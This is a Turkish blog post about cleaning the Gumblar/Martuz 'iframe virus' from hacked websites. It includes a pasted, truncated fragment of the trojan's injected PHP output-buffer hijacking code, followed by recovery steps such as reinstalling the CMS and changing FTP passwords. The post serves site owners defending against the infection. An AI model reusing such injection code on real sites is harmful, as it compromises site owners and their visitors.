İframe Virüsü Nedir? Nasıl Temizlenir?
By | Yorum YokLeave a Comment
Son Güncelleme: 19 Aralık 2010

İframe Virüsü Nedir? Nasıl Temizlenir?
İframe Virüsü Nedir ? Nasıl Nasıl Temizlenir?

"iframe virüsü" terimini google’da arattıgınızda yüzlerce sayfa karşınıza
çıkacaktır ve bir süre önce benimde başıma gelmişti bu sorun iframe virüsü
bulaştımı gitmeyen bir virüstür kodları temizlersiniz ama tekrar geri
yazılır sebebi bilgisayarınıza bulaşan bir virüsün tüm sayfalara kod
eklenmesi ile sizde bu zincire giriyorsunuz. 
yapılması gereken 2 önemli adım ftp şifrenizi kesinlikle değiştirin ve
bilgisayarınızda  virüs temizliği web sitenizde ise virüslü kodların
temizliğinin yapılması şart.
Benim Başıma bu sorunu yaratan virüsün adı Gumblar/Martuz virüsüdür daha
doğrusu bir trojandır kendileri.
bir süre önce konu hakkında bir yazı yazmıştım yazıyı aynen yayınlıyoruz
ve daha sonra detaylı bir şekilde nasıl iframe virüsünün temizleneceğini
açıklayacağız.

 

1 değil 2 değil oyunu-oyna.info isimli siteyi burasi vasıtasıyla
satın aldım iyi güzel pazarlık yapıldı her anlaşmasağlandı o güne kadar
tıkır tıkır çalışan site adamın vasfındsan bizim adımıza geçince bir
haller oldu ilk olarak host sapıtmaya VEYA SİTEDE ABUK SABUK REKLAMLAR
AÇILIR PENCERELER ÇIKMAYA BAŞLADI daha sonra isimtescilden bir host
aldık ama yine beladan kurtulamadık sürekli kod gömüyor şz. ler onarcade
sistem ve gömülen kodlarda phpr.org ile şifrelenmiş ve hersafaya
yerleştirilmiş 1 günüm temizlemek işle geçti ki yine temizlenmedi
googleda site size zarar verebilişr uyarısı veriyor. yani bu siteden
aldıgımdan beri hayır görmedim kısacası.

kendimin yönetiminde açtıgım 2 yıl süreyle faliyette olan
1download-tr.info sitede hiç bir sorun yaşamadım son zamanlarda
pluginler kaynaklı hacklemeler olmuştu
kısacası kodlar ise şöyle:

her sayfdabu kod eklenmiş ve fonksiyon sayfasına eklenilen kod :
#is’,$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match(‘#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#’,$v)||preg_match(‘#[\(\[](\s*\d+,){20,}#’,$v);if((preg_match(‘#\beval\b#’,$
v)&&($e||strpos($v,’fromCharCode’)))||($e&&strpos( $v,’document.write’)))$s=str_replace($v,”,$s);}$s
1=preg_replace(‘#

#’,”,$s);if(stristr($s,’‘))$s=$s1.TMP_XHGFJOKL;return
$g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($
b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1)
as $v)if(($a=$v['name'])==’tmp_lkojfghx’)return;else $s[]=array($a==’default
output handler’?false:$a);for($i=count($s)-1;$i>=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(‘tmp_l
kojfghx’);for($i=0;$i

görüldüğü üzere bu ..liği yapan phpr.org sayesinde kodları şifrelemiş
ama decoder’i olmadıgından ne oldugu gözükmüyor. 




 

 Yukarıda bir sinir harbi ile yazıdımdan dolayı gerekli küfür ve
hakaretleri affetmenizi umuyorum :)

Eğer sizinde başınız bu sorundan beladaysa şimdi çözüme gelelim

iframe virüsü nasıl temizlenir.

Nedir bu iframe virüsleri İframe virüsü genellikle FTP programlarınızdaki
kayıtlı oturumlar aracılığıyla altyapınıza girer ve genelde index.php –
index.html gibi dosyalara etki eder… Girdiğinde sitenizi rahat bırakmaz
arkadaşlar. Önce ftp programınızla virüs giren sayfalarınızı teker teker
virüs kodlarını silmeyi denersiniz. Bu sistemde herzaman işe yaramıyor
maalesef. Peki işe yaramadığında ne mi yapıyoruz ? Hemen açıklayalım.
1) Veritabanı yedeğinizi alın
2) Kullandığınız scriptteki temaları,.htacses kağıtlarınızı,
eklentileri ve hosttaki uploadları indirin. (Ardından taratın ancak
genelde iframe bu dosyalara girmez)
3) Geri kalan tüm dosyaları silin
4) Önceden kullanmış olduğunuz scripti (wordpress, drupal, vB, myBB
artık ne karınağrısıysa) sıfırdan indirip ftp ye atın.
5) Veritabanı yedeğinizi tekrar yükleyin.
6) .htacses dosyanızı, temalarınızı, eklentilerinizi ve
uploadlarınızı yeniden yükleyin.
7) FTP login bilgilerinizi değiştirin.*Önemli
İşte bu kadarArkadaşlar aslında bunu başka sitelerde değişik yöntemlerlede
halledebilirsiniz ancak bu kesin çözümdür.

Pratik çözüm ise (Problemimi bu şekilde çözdüm) 3 Adımda iframe virüs
temizleme

 

  1. Öncelikle en önemlisi ftp şifrenizi değiştirin
  2. Bilgisayarınızda virüs taraması yapın
  3. Daha
    Sonra ftpdeki tüm içeriğinizi indirin httaccess php dosyaları js ler vs
    tüm içeriği indirdikten sonra Ultra edit isimli programı yükleyin ve
    program içerisinden tüm kodları değiştirme özelliği ile silin ve
    dosyalarınızı kaydetip tekrar ftp’ye yükleyin.

Ben problemimi bu şekilde çözmüştüm yukarıdaki kesin çözüm ile uğraşmak
istemeyenler yapabilir pratik çözümümü faydalı olması dileğiyle
 

Sesli Dünya
Bilgisayarinizda flash player 6 Görülmüyor. Buraya Tikliyarak Macromedia Sitesine Gidip indirin.
Yorumlarınız
Hic Bir Yorum Bulunmamakta
Yorum Yaz